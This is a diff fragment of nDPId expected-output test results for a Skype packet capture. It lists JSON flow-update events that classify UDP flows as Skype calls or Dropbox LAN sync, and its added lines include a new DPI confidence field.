-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969656652,"flow_last_seen":1431969746885,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969657029,"flow_last_seen":1431969747141,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969656652,"flow_last_seen":1431969746885,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969657029,"flow_last_seen":1431969747142,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
